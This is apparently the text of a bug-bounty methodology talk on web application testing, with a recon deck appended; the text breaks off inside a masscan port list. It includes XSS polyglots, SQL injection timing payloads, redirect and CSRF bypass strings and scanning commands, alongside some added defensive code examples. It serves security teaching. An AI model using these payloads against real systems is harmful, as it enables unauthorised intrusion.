
How To Shot Web

(Better hacking in 2015)

whoami
Jason Haddix

● Bugcrowd
● Director of Technical Ops
● Hacker & Bug hunter
● #1 on all-time leaderboard bugcrowd 2014

@jhaddix

What this talk’s about...

Hack
Stuff
Better
(and practically)
And…LOTS of memes…. only some are funny
More Specifically
Step 1: Cut a hole in a box... j/k

Step 1: Started with my bug hunting methodology
Step 2: Parsed some of the top bug hunters’ research (web/mobile only for now)
Step 3: Create kickass preso

Topics? BB philosophy shifts, discovery techniques, mapping methodology, parameters oft attacked, useful fuzz strings, bypass or filter evasion techniques, new/awesome tooling
Philosophy

Differences from standard testing

Single-sourced
● looking mostly for common-ish vulns
● not competing with others
● incentivized for count
● payment based on sniff test

Crowdsourced
● looking for vulns that aren’t as easy to find
● racing vs. time
● competitive vs. others
● incentivized to find unique bugs
● payment based on impact not number of findings
The regular methodologies

Discovery

Find the road less traveled
^ means find the application (or parts of an application) less tested.
1. *.acme.com scope is your friend
2. Find domains via Google (and others!)
   a. Can be automated well via recon-ng and other tools.
3. Port scan for obscure web servers or services (on all domains)
4. Find acquisitions and the bounty acquisition rules
   a. Google has a 6 month rule
5. Functionality changes or re-designs
6. Mobile websites
7. New mobile app versions

Tool: Recon-ng script (enumall.sh)

https://github.com/jhaddix/domain
LMGTFY
https://www.facebook.com/notes/phwd/facebook-bug-bounties/707217202701640

Port Scanning!
Port scanning is not just for Netpen!

A full port scan of all your new found targets will usually
yield #win:

● separate webapps
● extraneous services
● Facebook had Jenkins Script console with no auth
● IIS.net had rdp open vulnerable to MS12_020

nmap -sS -A -PN -p- --script=http-title dontscanme.bro

^ syn scan, OS + service fingerprint, no ping, all ports, http titles

Mapping
Mapping tips
● Google
● *Smart* Directory Brute Forcing
  ○ RAFT lists (included in Seclists)
  ○ SVN Digger (included in Seclists)
  ○ Git Digger
● Platform Identification:
  ○ Wappalyzer (Chrome)
  ○ Builtwith (Chrome)
  ○ retire.js (cmd-line or Burp)
  ○ Check CVE’s
● Auxiliary
  ○ WPScan
  ○ CMSmap
Directory Bruteforce Workflow
After bruteforcing, look for other status codes indicating you are denied or require auth, then append the list there to test for misconfigured access control.

Example:

GET http://www.acme.com - 200
GET http://www.acme.com/backlog/ - 404
GET http://www.acme.com/controlpanel/ - 401 hmm.. ok
GET http://www.acme.com/controlpanel/[bruteforce here now]
Mapping/Vuln Discovery using OSINT
Find previous/existing problem:
● Xssed.com
● Reddit XSS - /r/xss
● Punkspider
● xss.cx
● xssposed.org
● twitter searching
● ++
Issues might already be reported, but use the flaw area and injection type to guide you to further injections or filter bypass.
Intrigue
New OSINT/Mapping project, intrigue:

● 250+ bounty programs
● Crawl
● DNS info + bruteforce
● Bounty metadata (links, rewards, scope)
● API
Crawling
Using Ruby + Anemone + JSON + Grep

$ cat test_target_json.txt | grep redirect

https://test_target/redirect/?url=http://twitter.com/...
https://test_target/redirect/?url=http://facebook.com/...
https://test_target/redirect/?url=http://pinterest.com/...

Intrigue Tasks
Using Ruby + Anemone + JSON + Grep

● Brute force
● Spider
● Nmap
● etc

Auth and Session
Auth (better be quick)
Auth Related (more in logic, priv, and transport sections)

● User/pass discrepancy flaw
● Registration page harvesting
● Login page harvesting
● Password reset page harvesting
● No account lockout
● Weak password policy
● Password not required for account updates
● Password reset tokens (no expiry or re-use)

Session (better be quick)
Session Related

● Failure to invalidate old cookies
● No new cookies on login/logout/timeout
● Never ending cookie length
● Multiple sessions allowed
● Easily reversible cookie (base64 most often)
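The session items above as checks you can run: a decoder that flags the "easily reversible" (base64-over-JSON) cookie, and a small server-side session store that rotates on login, invalidates on logout and expires when idle, exercised the way the later "check your cookie, log out, check cookie, log in, check cookie, submit old cookie" step describes. Added example, not code from the slides; the store, its key, the user names and the sample cookie are all constructed.

```python
import base64
import binascii
import hashlib
import hmac
import json
import re
import secrets
import time

B64_ALPHABET = re.compile(r"^(?:[A-Za-z0-9+/]+|[A-Za-z0-9_-]+)=*$")


def try_base64(value: str):
    """Decode standard or URL-safe base64 (padding optional); None if not base64."""
    if not value or not B64_ALPHABET.match(value):
        return None
    padded = value + "=" * (-len(value) % 4)
    try:
        return base64.b64decode(padded, validate=True)
    except (binascii.Error, ValueError):
        pass
    try:
        return base64.urlsafe_b64decode(padded)
    except (binascii.Error, ValueError):
        return None


def reversible_fields(cookie: str):
    """'Easily reversible cookie' check: field names if the cookie is base64 over JSON, else None."""
    raw = try_base64(cookie)
    if raw is None:
        return None
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None          # binary: an opaque token, not a readable structure
    if not text.isprintable():
        return None
    try:
        obj = json.loads(text)
    except ValueError:
        return None
    return sorted(obj) if isinstance(obj, dict) else None


class SessionStore:
    """Server-side sessions: cookie = opaque id + HMAC, rotated on login, dropped on logout, idle-expired."""
    IDLE_TIMEOUT = 15 * 60  # seconds; closes the 'never ending cookie' item

    def __init__(self, key: bytes):
        self._key = key
        self._sessions = {}  # sid -> {"user": ..., "seen": timestamp}

    def _sign(self, sid: str) -> str:
        return hmac.new(self._key, sid.encode(), hashlib.sha256).hexdigest()

    def _sid(self, cookie):
        """Session id if the cookie's signature verifies, else None."""
        if not cookie or "." not in cookie:
            return None
        sid, sig = cookie.rsplit(".", 1)
        return sid if hmac.compare_digest(sig, self._sign(sid)) else None

    def login(self, old_cookie, user: str) -> str:
        """Invalidate whatever the client held, then issue a fresh cookie."""
        self.logout(old_cookie)
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": user, "seen": time.time()}
        return f"{sid}.{self._sign(sid)}"

    def logout(self, cookie) -> None:
        sid = self._sid(cookie)
        if sid:
            self._sessions.pop(sid, None)

    def user_for(self, cookie, now=None):
        """User for a cookie, or None if unknown, revoked or idle too long."""
        sid = self._sid(cookie)
        entry = self._sessions.get(sid) if sid else None
        if entry is None:
            return None
        now = now or time.time()
        if now - entry["seen"] > self.IDLE_TIMEOUT:
            self._sessions.pop(sid)
            return None
        entry["seen"] = now
        return entry["user"]


def cookie_walkthrough(store: SessionStore) -> dict:
    """Log in, log out, log in again, then present the old cookie and an idle one."""
    first = store.login(None, "alice")
    store.logout(first)
    second = store.login(first, "alice")
    return {
        "old_after_logout": store.user_for(first),
        "new_after_login": store.user_for(second),
        "old_after_relogin": store.user_for(first),
        "new_after_idle": store.user_for(second, now=time.time() + 3600),
    }


# Constructed sample: a "session" that is nothing but base64 over JSON.
SAMPLE_REVERSIBLE = base64.b64encode(b'{"uid": 1337, "role": "user"}').decode()
```

Every value in the walkthrough except `new_after_login` comes back `None`; a store that returns a user for the old cookie has the "failure to invalidate" flaw from the list.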
Tactical Fuzzing - XSS

XSS
Core Idea: Does the page functionality display something to the users?

For time sensitive testing the 80/20 rule applies. Many testers use Polyglot payloads. You probably have too!
XSS

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

Multi-context, filter bypass based polyglot payload #1 (Rsnake XSS Cheat Sheet)

XSS

'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg">

Multi-context, filter bypass based polyglot payload #2 (Ashar Javed XSS Research)

XSS

" onclick=alert(1)//<button ' onclick=alert(1)//> */ alert(1)//

Multi-context, filter bypass based polyglot payload #3 (Mathias Karlsson)
Other XSS Input Vectors

● Customizable Themes & Profiles via CSS
● Event or meeting names
● URI based
● Imported from a 3rd party (think Facebook integration)
● JSON POST Values (check returning content type)
● File Upload names
● Uploaded files (swf, HTML, ++)
● Custom Error pages
● fake params - ?realparam=1&foo=bar'+alert(/XSS/)+'
● Login and Forgot password forms
SWF Parameter XSS
Common Params:

onload, allowedDomain, movieplayer, xmlPath, eventhandler, callback (more on OWASP page)

Common Injection Strings:

\%22})))}catch(e){alert(document.domain);}//

"]);}catch(e){}if(!self.a)self.a=!alert(document.domain);//

"a")(({type:"ready"}));}catch(e){alert(1)}//

Tactical Fuzzing - SQLi
SQL Injection
Core Idea: Does the page look like it might need to call on stored data?

There exist some SQLi polyglots, e.g.:

SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/

Works in single quote context, works in double quote context, works in "straight into query" context! (Mathias Karlsson)

SQL Injection
You can also leverage the large database of fuzzlists from Seclists here:
SQL Injection Observations
Blind is predominant, Error based is highly unlikely.

'%2Bbenchmark(3200,SHA1(1))%2B'

'+BENCHMARK(40000000,SHA1(1337))+'

SQLMap is king!

● Use -l to parse a Burp log file.
● Use Tamper Scripts for blacklists.
● SQLiPy Burp plugin works well to instrument SQLmap quickly.

Lots of injection in web services!

Common Parameters or Injection points
● ID
● Currency Values
● Item number values
● sorting parameters (i.e order, sort, etc)
● JSON and XML values
● Cookie values (really?)
● Custom headers (look for possible integrations with CDN’s or WAF’s)
● REST based Services

SQLmap SQLiPy
Best SQL injection resources
DBMS Specific Resources

MySQL
● PentestMonkey's MySQL injection cheat sheet
● Reiners MySQL injection Filter Evasion Cheatsheet
MSSQL
● EvilSQL's Error/Union/Blind MSSQL Cheatsheet
● PentestMonkey's MSSQL SQLi injection Cheat Sheet
Oracle
● PentestMonkey's Oracle SQLi Cheatsheet
PostgreSQL
● PentestMonkey's Postgres SQLi Cheatsheet
Others
● Access SQLi Cheatsheet
● PentestMonkey's Ingres SQL Injection Cheat Sheet
● PentestMonkey's DB2 SQL Injection Cheat Sheet
● PentestMonkey's Informix SQL Injection Cheat Sheet
● SQLite3 Injection Cheat sheet
● Ruby on Rails (Active Record) SQL Injection Guide

Tactical Fuzzing - FI & Uploads
Local file inclusion
Core Idea: Does it (or can it) interact with the server file system?

Liffy is new and cool here but you can also use Seclists.

Common Parameters or Injection points

file=
location=
locale=
path=
display=
load=
read=
retrieve=
Malicious File Upload ++
This is an important and common attack vector in this type of testing.

File upload functions need a lot of protections to be adequately secure.

Attacks:

● Upload unexpected file format to achieve code exec (swf, html, php, php3, aspx, ++) Web shells or...
● Execute XSS via same types of files. Images as well!
● Attack the parser to DoS the site or XSS via storing payloads in metadata or file header
● Bypass security zones and store malware on target site via file polyglots

Malicious File Upload ++
File upload attacks are a whole presentation. Try this one to get a feel for bypass techniques:

● content type spoofing
● extension trickery
● File in the hole! presentation - http://goo.gl/VCXPh6

Malicious File Upload ++

As referenced, file polyglots can be used to store malware on servers!

See @dan_crowley ‘s talk: http://goo.gl/pquXC2

and @angealbertini research: corkami.com
Remote file includes and redirects

Look for any param with another web address in it. Same params from LFI can present here too.

Common blacklist bypasses:

● escape "/" with "\/" or "//" with "\/\/"
● try single "/" instead of "//"
● remove http i.e. "continue=//google.com"
● "/\/\" , "|/" , "/%09/"
● encode, slashes
● "./" CHANGE TO "..//"
● "../" CHANGE TO "....//"
● "/" CHANGE TO "//"

Redirections Common Parameters or Injection points

dest=
continue=
redirect=
url= (or anything with "url" in it)
uri= (same as above)
window=
next=
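The two sides of that redirect slide in code: a blacklist-style check of the kind those bypass strings defeat, beside a hardened validator that normalises the target before deciding. Added example, not code from the slides; `evil.example` and the allow-listed `acme.com` hosts are placeholders, and the function names are mine.

```python
from urllib.parse import unquote, urlsplit

# Hosts this (constructed) application may redirect to.
ALLOWED_HOSTS = {"www.acme.com", "acme.com"}

# Bypass forms listed on the slide, pointed at a placeholder external host.
BYPASSES = [
    "//evil.example",             # "remove http": scheme-relative URL
    "\\/\\/evil.example",         # escape "//" with "\/\/"
    "/\\/\\evil.example",         # "/\/\"
    "|/evil.example",             # "|/"
    "/%09/evil.example",          # "/%09/": a tab hidden by percent encoding
    "..//evil.example",           # "./" changed to "..//"
    "....//evil.example",         # "../" changed to "....//"
    "http:\\/\\/evil.example",    # escaped slashes after the scheme
    "https://evil.example",       # plain absolute URL
]


def weak_is_safe(target: str) -> bool:
    """Blacklist-style check of the kind the bypasses defeat: reject only a
    leading http(s):// or a leading '//', pass everything else through."""
    lowered = target.lower()
    return not (lowered.startswith(("http://", "https://")) or lowered.startswith("//"))


def hardened_is_safe(target: str) -> bool:
    """Allow a same-origin relative path, or an absolute http(s) URL whose host
    is allow-listed. Normalise first so backslashes, control characters and
    percent encoding cannot hide an authority section from the parser."""
    cleaned = unquote(target)
    cleaned = "".join(ch for ch in cleaned if ch.isprintable() and not ch.isspace())
    cleaned = cleaned.replace("\\", "/")  # browsers treat '\' as '/' here
    if cleaned.startswith("/") and not cleaned.startswith("//"):
        return True  # relative path on this origin
    parts = urlsplit(cleaned)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return False  # scheme-relative, pipe-prefixed or dot-prefixed junk
    return parts.hostname in ALLOWED_HOSTS


def weak_accepts():
    """Bypass strings the blacklist check lets through."""
    return [b for b in BYPASSES if weak_is_safe(b)]
```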
Remote file includes and redirects
RFI Common Parameters or Injection points

File=
document=
Folder=
root=
Path=
pg=
style=
pdf=
template=
php_path=
doc=

CSRF
CSRF
Everyone knows CSRF but the TLDR here is find sensitive functions and attempt to CSRF.

Burp's CSRF PoC is fast and easy for this:

CSRF
Many sites will have CSRF protection, focus on CSRF bypass!

Common bypasses:

● Remove CSRF token from request
● Remove CSRF token parameter value
● Add bad control chars to CSRF parameter value
● Use a second identical CSRF param
● Change POST to GET

Check this out...
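A self-test for CSRF middleware that replays the five bypasses above against a lax token check and a strict one. Added example, not code from the slides or from Burpy; requests are plain dicts constructed here (parameter values are lists, as frameworks expose repeated parameters) and the function names are illustrative.

```python
import hmac
import secrets

MUTATING_METHODS = {"POST", "PUT", "PATCH", "DELETE"}


def new_session_token() -> str:
    """Per-session secret kept server-side and embedded in every form."""
    return secrets.token_hex(16)


def lax_csrf_ok(req: dict, session_token: str) -> bool:
    """Weak check of the kind the listed bypasses defeat: only POST is
    guarded, a missing or blank token counts as 'nothing to verify', and
    only the first of repeated values is compared (non-constant-time)."""
    if req["method"] != "POST":
        return True                         # GET reaches the handler unchecked
    values = req["params"].get("csrf_token")
    if not values or not values[0].strip():
        return True                         # absent, empty or control chars only
    return values[0] == session_token


def strict_csrf_ok(req: dict, session_token: str) -> bool:
    """A state-changing endpoint accepts only mutating methods carrying exactly
    one token that matches the session's token."""
    if req["method"] not in MUTATING_METHODS:
        return False                        # state change over GET is refused
    values = req["params"].get("csrf_token")
    if not values or len(values) != 1:
        return False                        # missing or duplicated (ambiguous)
    token = values[0]
    if len(token) != len(session_token):
        return False
    return hmac.compare_digest(token.encode(), session_token.encode())


def slide_mutations(req: dict):
    """Yield (name, request) for the five bypasses on the slide, derived from
    one legitimate request. The attacker does not know the real token, so the
    duplicate variant carries junk values."""
    params = req["params"]

    def variant(new_params, method=None):
        return {"method": method or req["method"], "params": new_params}

    without = {k: v for k, v in params.items() if k != "csrf_token"}
    yield "remove token parameter", variant(without)
    yield "empty token value", variant({**params, "csrf_token": [""]})
    yield "control chars in token", variant({**params, "csrf_token": ["\t\r\n"]})
    yield "duplicate token param", variant({**params, "csrf_token": ["junk", "junk"]})
    yield "POST changed to GET", variant(without, method="GET")


def audit(checker, session_token: str) -> set:
    """Run every mutation through a checker and return the names it lets
    through: the 'instrument attacks, diff responses, alert on outliers'
    loop of the Burpy slides, reduced to the token check itself."""
    legit = {"method": "POST",
             "params": {"email": ["new@acme.example"],
                        "csrf_token": [session_token]}}
    if not checker(legit, session_token):
        raise ValueError("checker rejects the legitimate request")
    return {name for name, mutated in slide_mutations(legit)
            if checker(mutated, session_token)}
```

This particular lax checker happens to survive the duplicate-parameter variant because it compares the first value; one that takes the last value, or bails out on ambiguous input, would not.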
CSRF
Debasish Mandal wrote a python tool to automate finding CSRF bypasses called Burpy.

Step 1: Enable logging in Burp. Crawl a site with Burp completely executing all functions.

Step 2: Create a template...

CSRF
Step 3: Run burpy on Burp log file..

Logic:

1. Parse burp log file
2. re-request everything instrumenting 4/5 attacks in previous slide
3. diff responses
4. alert on outliers
5. profit

CSRF
Or focus on pages without the token in Burp:

https://github.com/arvinddoraiswamy/mywebappscripts/blob/master/BurpExtensions/csrf_token_detect.py
CSRF
CSRF Common Critical functions

● Add / Upload file
● Password change
● Email change
● Transfer Money / Currency
● Delete File
● Profile edit

Privilege, Transport, Logic
Privilege
Often logic, priv, auth bugs are blurred.

Testing user priv:

1. admin has power
2. peon has none
3. peon can use function only meant for admin

Privilege
1. Find site functionality that is restricted to certain user types
2. Try accessing those functions with lesser/other user roles
3. Try to directly browse to views with sensitive information as a lesser priv user

Common Functions or Views
● Add user function
● Delete user function
● start project / campaign / etc function
● change account info (pass, CC, etc) function
● customer analytics view
● payment processing view
● any view with PII

Autorize Burp plugin is pretty neat here...

https://github.com/Quitten/Autorize

1. Browse using high priv user
2. Login with a lower priv user
3. Burp Plugin re-requests to see if low priv can access high priv
Insecure direct object references
IDORs are common place in bounties, and hard to catch with scanners.

Find any and all UIDs

● increment
● decrement
● negative values
● Attempt to perform sensitive functions substituting another UID
  ○ change password
  ○ forgot password
  ○ admin only functions

Idor’s
Common Functions, Views, or Files

● Everything from the CSRF Table, trying cross account attacks
● Sub: UIDs, user hashes, or emails
● Images that are non-public
● Receipts
● Private Files (pdfs, ++)
● Shipping info & Purchase Orders
● Sending / Deleting messages
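The Autorize workflow above (record as a high-privilege user, re-request as a lower one, flag identical responses) run against a tiny in-memory app that also carries the receipt IDOR from the list, with and without the missing checks. Added example, not the plugin's code; the users, sessions, routes and receipts are constructed.

```python
from dataclasses import dataclass

# Constructed users and data. Session cookie -> user record.
USERS = {
    "sess-admin": {"uid": 1, "role": "admin"},
    "sess-alice": {"uid": 2, "role": "user"},
    "sess-bob": {"uid": 3, "role": "user"},
}
RECEIPTS = {101: {"owner": 2, "total": "42.00"}, 102: {"owner": 3, "total": "13.37"}}


@dataclass
class Response:
    status: int
    body: str


def handle(session: str, method: str, path: str, *, fixed: bool) -> Response:
    """Tiny router. With fixed=False it carries the two bugs the slides target:
    an admin-only view that nothing but the menu hides, and a receipt lookup
    keyed on the id alone (an IDOR). fixed=True adds the role and ownership
    checks that close them."""
    user = USERS.get(session)
    if user is None:
        return Response(401, "login required")
    if method == "GET" and path == "/admin/users":
        if fixed and user["role"] != "admin":
            return Response(403, "forbidden")
        return Response(200, "user list")
    if method == "GET" and path.startswith("/receipts/"):
        try:
            rid = int(path.rsplit("/", 1)[1])
        except ValueError:
            return Response(400, "bad id")
        receipt = RECEIPTS.get(rid)
        # Ownership check: a receipt you do not own looks exactly like one
        # that does not exist, so ids cannot be enumerated by status code.
        if receipt is None or (
            fixed and receipt["owner"] != user["uid"] and user["role"] != "admin"
        ):
            return Response(404, "no such receipt")
        return Response(200, f"receipt {rid}: {receipt['total']}")
    return Response(404, "not found")


def authorize_replay(recorded, high_session: str, low_session: str, *, fixed: bool):
    """Replay every request recorded in the high-privilege session with the
    lower-privilege one and return the paths where the low user received the
    same successful response, i.e. where the privilege boundary did not hold."""
    findings = []
    for method, path in recorded:
        high = handle(high_session, method, path, fixed=fixed)
        low = handle(low_session, method, path, fixed=fixed)
        if high.status == 200 and (low.status, low.body) == (high.status, high.body):
            findings.append(path)
    return findings


# Requests "recorded" while browsing as the admin (constructed).
RECORDED_AS_ADMIN = [("GET", "/admin/users"), ("GET", "/receipts/102"), ("GET", "/profile")]
```

Replaying bob's recorded requests as alice isolates the IDOR: the receipt endpoint answers identically for both users until the ownership check is in place.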
Transport
Most security concerned sites will enable HTTPS. It’s your job to ensure they’ve done it EVERYWHERE. Most of the time they miss something.

Examples:

● Sensitive images transported over HTTP
● Analytics with session data / PII leaked over HTTP

Transport

https://github.com/arvinddoraiswamy/mywebappscripts/tree/master/ForceSSL

Logic
Logic flaws that are tricky, mostly manual:

● substituting hashed parameters
● step manipulation
● use negatives in quantities
● authentication bypass
● application level DoS
● Timing attacks

Mobile
Data Storage

It’s common to see mobile apps not applying encryption to the files that store PII. Common places to find PII unencrypted:

● Phone system logs (avail to all apps)
● webkit cache (cache.db)
● plists, dbs, etc
● hardcoded in the binary

Quick spin-up for iOS
Daniel Mayer’s idb tool:

Logs!

Auxiliary

The vulns formerly known as “noise”
● Content Spoofing or HTML injection
● Referer leakage
● security headers
● path disclosure
● clickjacking
● ++

How to test a web app in n minutes
How can you get maximum results within a given time window?
Data Driven Assessment (diminishing return FTW)
1. Visit the search, registration, contact, password reset, and comment forms and hit them with your polyglot strings
2. Scan those specific functions with Burp’s built-in scanner
3. Check your cookie, log out, check cookie, log in, check cookie. Submit old cookie, see if access.
4. Perform user enumeration checks on login, registration, and password reset.
5. Do a reset and see if the password comes plaintext, uses a URL based token, is predictable, can be used multiple times, or logs you in automatically
6. Find numeric account identifiers anywhere in URL and rotate them for context change
7. Find the security-sensitive function(s) or files and see if vulnerable to non-auth browsing (idors), lower-auth browsing, CSRF, CSRF protection bypass, and see if they can be done over HTTP.
8. Directory brute for top short list on SecLists
9. Check upload functions for alternate file types that can execute code (xss or php/etc/etc)

~ 15 minutes
Things to take with you…
1. Crowdsourced testing is different enough to pay attention to
2. Crowdsourcing focuses on the 20% because the 80% goes quick
3. Data analysis can yield the most successfully attacked areas
4. A 15 minute web test, done right, could yield a majority of your critical vulns
5. Add polyglots to your toolbelt
6. Use SecLists to power your scanners
7. Remember to periodically refresh your game with the wisdom of other techniques and other approaches

Follow these ninjas who I profiled: https://twitter.com/Jhaddix/lists/bninjas

Gitbook project: The Bug Hunters Methodology
This preso ended up being way too much to fit in a 45 min talk so... we turned it into a Git project! (if you are reading this from the Defcon DVD check my twitter or Github for linkage)

● 50% of research still unparsed
● More tooling to automate
● XXE and parser attacks
● XSRF
● Captcha bypass
● Detailed logic flaws
● More mobile

Meme Count: 13

Attribution and Thanks
Tim Tomes - Recon-ng
Joe Giron - RFI params
Soroush Dalili - File in the Hole preso
Mathias Karlsson - polyglot research
Ashar Javed - polyglot/xss research
Ryan Dewhurst & Wpscan Team
Bitquark - for being a ninja, bsqli string
rotlogix - liffy LFI scanner
Arvind Doraiswamy - HTTPs, CSRF Burp Plugins
Barak Tawily - Autorize burp plugin
the RAFT list authors
Ferruh Mavituna - SVNDigger
Jaime Filson aka wick2o - GitDigger
Robert Hansen aka rsnake - polyglot / xss
Dan Crowley - polyglot research
Daniel Miessler - methodology, slide, and data contributions
My awesome team at Bugcrowd (Jon, Tod, Shpend, Ben, Grant, Fatih, Patrik, Kati, Kym, Abby, Casey, Chris, Sam, ++)
All the bug hunting community!!!
Domain Discovery
Expanding your scope like a boss
whoami

★ Jason Haddix - @jhaddix
★ Head of Trust and Security @Bugcrowd
★ 2014-2015 top hunter on Bugcrowd (9 currently)
★ Father, hacker, blogger, gamer!

Workflow (diagram):
Identify IPs and main TLDs: ASNs, Reverse Whois, Acquisitions, Trademarks, Shodan, ++
Domain scraping for discovered TLDs: enumall, sublist3r, Brutesubs, ++
Domain bruteforcing, Resolve && add new IP ranges: Altdns, Massdns, Sdbf
Portscan: nmap, masscan
Visual Identification: eyewitness, Manual

Platform Identification: Builtwith, Wappalyzer, Vulners Burp Plugin, ++
Content Discovery: spider, Gobuster, Wordlists, Burp, ++
Parameter discovery: Parameth, Burp analyze target
Auxiliary: Github
ASN’s

★ autonomous system number - http://bgp.he.net

ARIN & RIPE

★ https://whois.arin.net/ui/query.do
★ https://apps.db.ripe.net/db-web-ui/#/fulltextsearch

Rev whois

★ http://viewdns.info/
★ http://domainbigdata.com/
★ https://reverse.report/

Acquisitions

★ Crunchbase
★ Protected by distil bot protection
★ Stay tuned

Shodan Organization
★ https://www.shodan.io/search?query=org%3A%22Tesla+Motors%22

Others

★ Trademark In Google: "Tesla © 2016" "Tesla © 2015" "Tesla © 2017" inurl:tesla.com
★ Google Analytics/tag searching:
Sub Scraping

crt.sh

Google Certificate Transparency

OpenSSL SAN (Subject Alternative Name)


Sub Scraping

recon-ng/enumall Both sublist3r


ssltools.com API Google (Recon-ng now handles captcha) Baidu

HackerTarget.com API Bing Ask

Shodan Crt.sh DNSDumpster (scans.io)

ThreatCrowd Virustotal

Zoomeye (not core) Netcraft Ptrarchive.com

Threatcrowd regged by email (not core)

Zone transfer (not core)

RiskIQ API (not core)

Censys.io (not core)


Scraping - Sublist3r
★ Some configuration required
○ Update Docker IMage with non core
recon-ng modules
○ .env file
○ Disable Bruteforce (see why next...)
Sub Scraping (bespoke)

★ Cloudflare
★ Censys.io
★ Haven't tested but love
the ideas
Sub Bruting

1,136,964 line subdomain dictionary (all.txt)

Tool / Time to run / Threads / Found

subbrute / errored / 100 / 0
time ./subbrute.py -c 100 all.txt $TARGET.com | tee subbrute.output

gobuster / 21m15.857s / 100 / 87
time gobuster -m dns -u $TARGET.com -t 100 -w all.txt

massdns / 1m24.167 / n/a / 213
time ./subbrute.py /root/work/bin/all.txt $TARGET.com | ./bin/massdns -r resolvers.txt -t A -a -o -w massdns_output.txt -

dns-parallel-prober / 42m2.868s / 100 / 43
time python dns-queue.py $TARGET.com 100 $TARGET_outputfile -i /root/work/bin/all.txt

blacksheepwall / 256m9.385s / 100 / 61
time ./blacksheepwall_linux_amd64 -clean -dictionary /root/work/bin/all.txt -domain $TARGET.com

Sub Bruting

With Massdns, why not all of them?

all.txt

https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056
Permutation Scanning

Altdns : https://github.com/infosec-au/altdns
Permutation Scanning

SDBF: the Smart DNS Brute-Forcer approach is based on techniques derived from natural language modeling and leverages Markov Chain Models in order to build the first DNS scanner (SDBF) that leverages both training and advanced language modeling approaches.

https://github.com/jfrancois/SDBF

https://www.foo.be/papers/sdbf.pdf
Port Scanning
65536 unverified Hosts (a large target’s ASN)
Tool / Time to run / Found

masscan / 11m4.164s / 196
You can use a conf file for this!

masscan
-p1,3-4,6-7,9,13,17,19-26,30,32-33,37,42-43,49,53,70,79-85,88-90,99-100,106,109-111,113,119,125,135,139,143-144,146,161,163,179,199,211-212,222,254-256,259,264,280,301,306,311,
340,366,389,406-407,416-417,425,427,443-445,458,464-465,481,497,500,512-515,524,541,543-545,548,554-555,563,587,593,616-617,625,631,636,646,648,666-668,683,687,691,700,705
,711,714,720,722,726,749,765,777,783,787,800-801,808,843,873,880,888,898,900-903,911-912,981,987,990,992-993,995,999-1002,1007,1009-1011,1021-1100,1102,1104-1108,1110-111
4,1117,1119,1121-1124,1126,1130-1132,1137-1138,1141,1145,1147-1149,1151-1152,1154,1163-1166,1169,1174-1175,1183,1185-1187,1192,1198-1199,1201,1213,1216-1218,1233-1234,
1236,1244,1247-1248,1259,1271-1272,1277,1287,1296,1300-1301,1309-1311,1322,1328,1334,1352,1417,1433-1434,1443,1455,1461,1494,1500-1501,1503,1521,1524,1533,1556,1580,15
83,1594,1600,1641,1658,1666,1687-1688,1700,1717-1721,1723,1755,1761,1782-1783,1801,1805,1812,1839-1840,1862-1864,1875,1900,1914,1935,1947,1971-1972,1974,1984,1998-2010
,2013,2020-2022,2030,2033-2035,2038,2040-2043,2045-2049,2065,2068,2099-2100,2103,2105-2107,2111,2119,2121,2126,2135,2144,2160-2161,2170,2179,2190-2191,2196,2200,2222,2
251,2260,2288,2301,2323,2366,2381-2383,2393-2394,2399,2401,2492,2500,2522,2525,2557,2601-2602,2604-2605,2607-2608,2638,2701-2702,2710,2717-2718,2725,2800,2809,2811,286
9,2875,2909-2910,2920,2967-2968,2998,3000-3001,3003,3005-3007,3011,3013,3017,3030-3031,3052,3071,3077,3128,3168,3211,3221,3260-3261,3268-3269,3283,3300-3301,3306,3322-
3325,3333,3351,3367,3369-3372,3389-3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689-3690,3703,3737,3766,3784,3800-3801,3809,3814,3826-3828,3851,3869,3871,3878,38
80,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000-4006,4045,4111,4125-4126,4129,4224,4242,4279,4321,4343,4443-4446,4449,4550,4567,4662,4848,4899-4900,4998,5000
-5004,5009,5030,5033,5050-5051,5054,5060-5061,5080,5087,5100-5102,5120,5190,5200,5214,5221-5222,5225-5226,5269,5280,5298,5357,5405,5414,5431-5432,5440,5500,5510,5544,5
550,5555,5560,5566,5631,5633,5666,5678-5679,5718,5730,5800-5802,5810-5811,5815,5822,5825,5850,5859,5862,5877,5900-5904,5906-5907,5910-5911,5915,5922,5925,5950,5952,595
9-5963,5987-5989,5998-6007,6009,6025,6059,6100-6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,6565-6567,6580,6646,6666-6669,6689,6692,6699,6779,6788-6789,
6792,6839,6881,6901,6969,7000-7002,7004,7007,7019,7025,7070,7100,7103,7106,7200-7201,7402,7435,7443,7496,7512,7625,7627,7676,7741,7777-7778,7800,7911,7920-7921,7937-79
38,7999-8002,8007-8011,8021-8022,8031,8042,8045,8080-8090,8093,8099-8100,8180-8181,8192-8194,8200,8222,8254,8290-8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651
-8652,8654,8701,8800,8873,8888,8899,8994,9000-9003,9009-9011,9040,9050,9071,9080-9081,9090-9091,9099-9103,9110-9111,9200,9207,9220,9290,9415,9418,9485,9500,9502-9503,9
535,9575,9593-9595,9618,9666,9876-9878,9898,9900,9917,9929,9943-9944,9968,9998-10004,10009-10010,10012,10024-10025,10082,10180,10215,10243,10566,10616-10617,10621,10
626,10628-10629,10778,11110-11111,11967,12000,12174,12265,12345,13456,13722,13782-13783,14000,14238,14441-14442,15000,15002-15004,15660,15742,16000-16001,16012,1601
